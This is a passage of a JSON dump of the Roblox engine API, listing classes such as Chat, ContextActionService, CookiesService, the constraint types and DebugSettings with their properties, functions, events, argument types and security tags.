oid","Arguments":[],"Name":"Undo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"Arguments":[{"Name":"waypoint","Type":"string"}],"Name":"OnRedo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Event"},{"Arguments":[{"Name":"waypoint","Type":"string"}],"Name":"OnUndo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CharacterAppearance","tags":[]},{"Superclass":"CharacterAppearance","type":"Class","Name":"BodyColors","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"HeadColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"LeftArmColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"LeftLegColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"RightArmColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"RightLegColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"TorsoColor","tags":[],"Class":"BodyColors"},{"Superclass":"CharacterAppearance","type":"Class","Name":"CharacterMesh","tags":[]},{"ValueType":"int","type":"Property","Name":"BaseTextureId","tags":[],"Class":"CharacterMesh"},{"ValueType":"BodyPart","type":"Property","Name":"BodyPart","tags":[],"Class":"CharacterMesh"},{"ValueType":"int","type":"Property","Name":"MeshId","tags":[],"Class":"CharacterMesh"},{"ValueType":"int","type":"Property","Name":"OverlayTextureId","tags":[],"Class":"CharacterMesh"},{"Superclass":"CharacterAppearance","type":"Class","Name":"Clothing","tags":[]},{"Superclass":"Clothing","type":"Class","Name":"Pants","tags":[]},{"ValueType":"Content","type":"Property","Name":"PantsTemplate","tags":[],"Class":"Pants"},{"Superclass":"Clothing","type":"Class","Name":"Shirt","tags":[]},{"ValueType":"Content","type":"Property","Name":"ShirtTemplate","tags":[],"Class":"Shirt"},{"Superclass":"CharacterAppearance","type":"Class","Name":"ShirtGraphic","tags":[]},{"ValueType":"Content","type":"Property","Name":"Graphic","tags":[],"Class":"ShirtGraphic"},{"Superclass":"CharacterAppearance","type":"Class","Name":"Skin","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"SkinColor","tags":[],"Class":"Skin"},{"Superclass":"Instance","type":"Class","Name":"Chat","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"partOrCharacter","Default":null},{"Type":"string","Name":"message","Default":null},{"Type":"ChatColor","Name":"color","Default":"Blue"}],"Name":"Chat","tags":[],"Class":"Chat","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"stringToFilter","Default":null},{"Type":"Instance","Name":"playerFrom","Default":null},{"Type":"Instance","Name":"playerTo","Default":null}],"Name":"FilterStringAsync","tags":[],"Class":"Chat","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"stringToFilter","Default":null},{"Type":"Instance","Name":"playerToFilterFor","Default":null}],"Name":"FilterStringForPlayerAsync","tags":[],"Class":"Chat","type":"YieldFunction"},{"Arguments":[{"Name":"part","Type":"Instance"},{"Name":"message","Type":"string"},{"Name":"color","Type":"ChatColor"}],"Name":"Chatted","tags":[],"Class":"Chat","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ChatFilter","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ClickDetector","tags":[]},{"ValueType":"float","type":"Property","Name":"MaxActivationDistance","tags":[],"Class":"ClickDetector"},{"Arguments":[{"Name":"playerWhoClicked","Type":"Instance"}],"Name":"MouseClick","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoHovered","Type":"Instance"}],"Name":"MouseHoverEnter","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoHovered","Type":"Instance"}],"Name":"MouseHoverLeave","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoClicked","Type":"Instance"}],"Name":"mouseClick","tags":["deprecated"],"Class":"ClickDetector","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ClusterPacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"CollectionService","tags":[]},{"ReturnType":"Objects","Arguments":[{"Type":"string","Name":"class","Default":null}],"Name":"GetCollection","tags":[],"Class":"CollectionService","type":"Function"},{"Arguments":[{"Name":"instance","Type":"Instance"}],"Name":"ItemAdded","tags":[],"Class":"CollectionService","type":"Event"},{"Arguments":[{"Name":"instance","Type":"Instance"}],"Name":"ItemRemoved","tags":[],"Class":"CollectionService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Color3Value","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Value","tags":[],"Class":"Color3Value"},{"Arguments":[{"Name":"value","Type":"Color3"}],"Name":"Changed","tags":[],"Class":"Color3Value","type":"Event"},{"Arguments":[{"Name":"value","Type":"Color3"}],"Name":"changed","tags":["deprecated"],"Class":"Color3Value","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Configuration","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Constraint","tags":[]},{"ValueType":"Object","type":"Property","Name":"Attachment0","tags":[],"Class":"Constraint"},{"ValueType":"Object","type":"Property","Name":"Attachment1","tags":[],"Class":"Constraint"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Constraint"},{"Superclass":"Constraint","type":"Class","Name":"BallSocketConstraint","tags":[]},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"BallSocketConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"BallSocketConstraint"},{"ValueType":"float","type":"Property","Name":"UpperAngle","tags":[],"Class":"BallSocketConstraint"},{"Superclass":"Constraint","type":"Class","Name":"HingeConstraint","tags":[]},{"ValueType":"ActuatorType","type":"Property","Name":"ActuatorType","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"AngularSpeed","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"AngularVelocity","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":["readonly"],"Class":"HingeConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"LowerAngle","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxAcceleration","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxTorque","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"ServoMaxTorque","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"TargetAngle","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"UpperAngle","tags":[],"Class":"HingeConstraint"},{"Superclass":"Constraint","type":"Class","Name":"MoveToConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"MaxForce","tags":[],"Class":"MoveToConstraint"},{"ValueType":"float","type":"Property","Name":"StabilizingDistance","tags":[],"Class":"MoveToConstraint"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"MoveToConstraint"},{"Superclass":"Constraint","type":"Class","Name":"RodConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentDistance","tags":["readonly"],"Class":"RodConstraint"},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"RodConstraint"},{"Superclass":"Constraint","type":"Class","Name":"RopeConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentLength","tags":["readonly"],"Class":"RopeConstraint"},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"RopeConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"RopeConstraint"},{"Superclass":"Constraint","type":"Class","Name":"SlidingBallConstraint","tags":[]},{"ValueType":"ActuatorType","type":"Property","Name":"ActuatorType","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"CurrentPosition","tags":["readonly"],"Class":"SlidingBallConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"LowerLimit","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxAcceleration","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxForce","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"ServoMaxForce","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Speed","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"TargetPosition","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"UpperLimit","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"SlidingBallConstraint"},{"Superclass":"SlidingBallConstraint","type":"Class","Name":"CylindricalConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"AzimuthalAngle","tags":[],"Class":"CylindricalConstraint"},{"ValueType":"float","type":"Property","Name":"InclinationAngle","tags":[],"Class":"CylindricalConstraint"},{"Superclass":"SlidingBallConstraint","type":"Class","Name":"PrismaticConstraint","tags":[]},{"Superclass":"Constraint","type":"Class","Name":"SpringConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentLength","tags":["readonly"],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"Damping","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"FreeLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MaxForce","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MaxLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MinLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"Stiffness","tags":[],"Class":"SpringConstraint"},{"Superclass":"Instance","type":"Class","Name":"ContentFilter","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"outstandingRequests","Default":null},{"Type":"int","Name":"cacheSize","Default":null}],"Name":"SetFilterLimits","tags":["LocalUserSecurity"],"Class":"ContentFilter","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetFilterUrl","tags":["LocalUserSecurity"],"Class":"ContentFilter","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ContentProvider","tags":[]},{"ValueType":"string","type":"Property","Name":"BaseUrl","tags":["readonly"],"Class":"ContentProvider"},{"ValueType":"int","type":"Property","Name":"RequestQueueSize","tags":["readonly"],"Class":"ContentProvider"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"contentId","Default":null}],"Name":"Preload","tags":[],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBaseUrl","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"count","Default":null}],"Name":"SetCacheSize","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"count","Default":null}],"Name":"SetThreadPool","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Array","Name":"contentIdList","Default":null}],"Name":"PreloadAsync","tags":[],"Class":"ContentProvider","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"ContextActionService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindAction","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindActionToInputTypes","tags":["deprecated"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"userInputTypeForActivation","Default":null},{"Type":"KeyCode","Name":"keyCodeForActivation","Default":"Unknown"}],"Name":"BindActivate","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindCoreAction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"UserInputState","Name":"state","Default":null},{"Type":"Instance","Name":"inputObject","Default":null}],"Name":"CallFunction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Instance","Name":"actionButton","Default":null}],"Name":"FireActionButtonFoundSignal","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Dictionary","Arguments":[],"Name":"GetAllBoundActionInfo","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Dictionary","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"GetBoundActionInfo","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetCurrentLocalToolIcon","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"description","Default":null}],"Name":"SetDescription","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"image","Default":null}],"Name":"SetImage","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"UDim2","Name":"position","Default":null}],"Name":"SetPosition","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"title","Default":null}],"Name":"SetTitle","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"UnbindAction","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"userInputTypeForActivation","Default":null},{"Type":"KeyCode","Name":"keyCodeForActivation","Default":"Unknown"}],"Name":"UnbindActivate","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"UnbindAllActions","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"UnbindCoreAction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"GetButton","tags":[],"Class":"ContextActionService","type":"YieldFunction"},{"Arguments":[{"Name":"actionAdded","Type":"string"},{"Name":"createTouchButton","Type":"bool"},{"Name":"functionInfoTable","Type":"Dictionary"}],"Name":"BoundActionAdded","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionChanged","Type":"string"},{"Name":"changeName","Type":"string"},{"Name":"changeTable","Type":"Dictionary"}],"Name":"BoundActionChanged","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionRemoved","Type":"string"},{"Name":"functionInfoTable","Type":"Dictionary"}],"Name":"BoundActionRemoved","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionName","Type":"string"}],"Name":"GetActionButtonEvent","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"toolEquipped","Type":"Instance"}],"Name":"LocalToolEquipped","tags":[],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"toolUnequipped","Type":"Instance"}],"Name":"LocalToolUnequipped","tags":[],"Class":"ContextActionService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Controller","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null},{"Type":"string","Name":"caption","Default":null}],"Name":"BindButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"GetButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"UnbindButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null},{"Type":"string","Name":"caption","Default":null}],"Name":"bindButton","tags":["deprecated"],"Class":"Controller","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"getButton","tags":["deprecated"],"Class":"Controller","type":"Function"},{"Arguments":[{"Name":"button","Type":"Button"}],"Name":"ButtonChanged","tags":[],"Class":"Controller","type":"Event"},{"Superclass":"Controller","type":"Class","Name":"HumanoidController","tags":[]},{"Superclass":"Controller","type":"Class","Name":"SkateboardController","tags":[]},{"ValueType":"float","type":"Property","Name":"Steer","tags":["readonly"],"Class":"SkateboardController"},{"ValueType":"float","type":"Property","Name":"Throttle","tags":["readonly"],"Class":"SkateboardController"},{"Arguments":[{"Name":"axis","Type":"string"}],"Name":"AxisChanged","tags":[],"Class":"SkateboardController","type":"Event"},{"Superclass":"Controller","type":"Class","Name":"VehicleController","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ControllerService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"CookiesService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"DeleteCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"SetCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"CustomEvent","tags":["deprecated"]},{"ReturnType":"Objects","Arguments":[],"Name":"GetAttachedReceivers","tags":[],"Class":"CustomEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"newValue","Default":null}],"Name":"SetValue","tags":[],"Class":"CustomEvent","type":"Function"},{"Arguments":[{"Name":"receiver","Type":"Instance"}],"Name":"ReceiverConnected","tags":[],"Class":"CustomEvent","type":"Event"},{"Arguments":[{"Name":"receiver","Type":"Instance"}],"Name":"ReceiverDisconnected","tags":[],"Class":"CustomEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CustomEventReceiver","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Source","tags":[],"Class":"CustomEventReceiver"},{"ReturnType":"float","Arguments":[],"Name":"GetCurrentValue","tags":[],"Class":"CustomEventReceiver","type":"Function"},{"Arguments":[{"Name":"event","Type":"Instance"}],"Name":"EventConnected","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Arguments":[{"Name":"event","Type":"Instance"}],"Name":"EventDisconnected","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Arguments":[{"Name":"newValue","Type":"float"}],"Name":"SourceValueChanged","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DataModelMesh","tags":["notbrowsable"]},{"ValueType":"Vector3","type":"Property","Name":"Offset","tags":[],"Class":"DataModelMesh"},{"ValueType":"Vector3","type":"Property","Name":"Scale","tags":[],"Class":"DataModelMesh"},{"ValueType":"Vector3","type":"Property","Name":"VertexColor","tags":[],"Class":"DataModelMesh"},{"Superclass":"DataModelMesh","type":"Class","Name":"BevelMesh","tags":["deprecated","notbrowsable"]},{"Superclass":"BevelMesh","type":"Class","Name":"BlockMesh","tags":[]},{"Superclass":"BevelMesh","type":"Class","Name":"CylinderMesh","tags":[]},{"Superclass":"DataModelMesh","type":"Class","Name":"FileMesh","tags":[]},{"ValueType":"Content","type":"Property","Name":"MeshId","tags":[],"Class":"FileMesh"},{"ValueType":"Content","type":"Property","Name":"TextureId","tags":[],"Class":"FileMesh"},{"Superclass":"FileMesh","type":"Class","Name":"SpecialMesh","tags":[]},{"ValueType":"MeshType","type":"Property","Name":"MeshType","tags":[],"Class":"SpecialMesh"},{"Superclass":"Instance","type":"Class","Name":"DataStoreService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"LegacyNamingScheme","tags":["LocalUserSecurity"],"Class":"DataStoreService"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"string","Name":"scope","Default":"global"}],"Name":"GetDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetGlobalDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"string","Name":"scope","Default":"global"}],"Name":"GetOrderedDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Debris","tags":[]},{"ValueType":"int","type":"Property","Name":"MaxItems","tags":["deprecated"],"Class":"Debris"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"item","Default":null},{"Type":"double","Name":"lifetime","Default":"10"}],"Name":"AddItem","tags":[],"Class":"Debris","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetLegacyMaxItems","tags":["LocalUserSecurity"],"Class":"Debris","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"item","Default":null},{"Type":"double","Name":"lifetime","Default":"10"}],"Name":"addItem","tags":["deprecated"],"Class":"Debris","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"DebugSettings","tags":["notbrowsable"]},{"ValueType":"int","type":"Property","Name":"AltCdnFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"AltCdnSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"AvailablePhysicalMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"BlockMeshSize","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"CPU","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CdnFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"CdnResponceTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CdnSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CpuCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CpuSpeed","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"DataModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ElapsedTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"ErrorReporting","type":"Property","Name":"ErrorReporting","tags":[],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"GfxCard","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"InstanceCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsFmodProfilingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsProfilingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsScriptStackTracingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"JobCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"LastCdnFailureTimeSpan","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"LuaRamLimit","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"NameDatabaseBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"NameDatabaseSize","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"OsIs64Bit","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"OsPlatform","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"OsPlatformId","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"OsVer","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PageFaultsPerSecond","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PageFileBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"float","type":"Property","Name":"PixelShaderModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PlayerCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PrivateBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PrivateWorkingSetBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ProcessCores","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"ProcessorTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ProfilingWindow","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RAM","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"ReportExtendedMachineConfiguration","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"ReportSoundWarnings","tags":[],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"Resolution","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RobloxFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"RobloxProductName","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"RobloxRespoceTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RobloxSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"RobloxVersion","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"SIMD","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"SystemProductName","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"TickCountSampleMethod","type":"Property","Name":"TickCountPreciseOverride","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"TotalPhysicalMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"TotalProcessorTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"float","type":"Property","Name":"VertexShaderModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"VideoMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"VirtualBytes","tags":["readonly"],"Class":"DebugSettings"},{"ReturnType":"void","Arguments":[],"Name":"LegacyScriptMode","tags":["LocalUserSecurity","deprecated"],"Class":"DebugSettings","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"ResetCdnFailureCounts","tags":["LocalUserSecurity"],"Class":"DebugSettings","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetBlockingRemove","tags":["LocalUserSecurity"],"Class":"DebugSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"DebuggerBreakpoint","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"Condition","tags":[],"Class":"DebuggerBreakpoint"},{"ValueType":"bool","type":"Property","Name":"IsEnabled","tags":[],"Class":"DebuggerBreakpoint"},{"ValueType":"int","type":"Property","Name":"Line","tags":["readonly"],"Class":"DebuggerBreakpoint"},{"Superclass":"Instance","type":"Class","Name":"DebuggerManager","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"DebuggingEnabled","tags":["readonly"],"Class":"DebuggerManager"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"script","Default":null}],"Name":"AddDebugger","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"EnableDebugging","tags":["LocalUserSecurity"],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetDebuggers","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[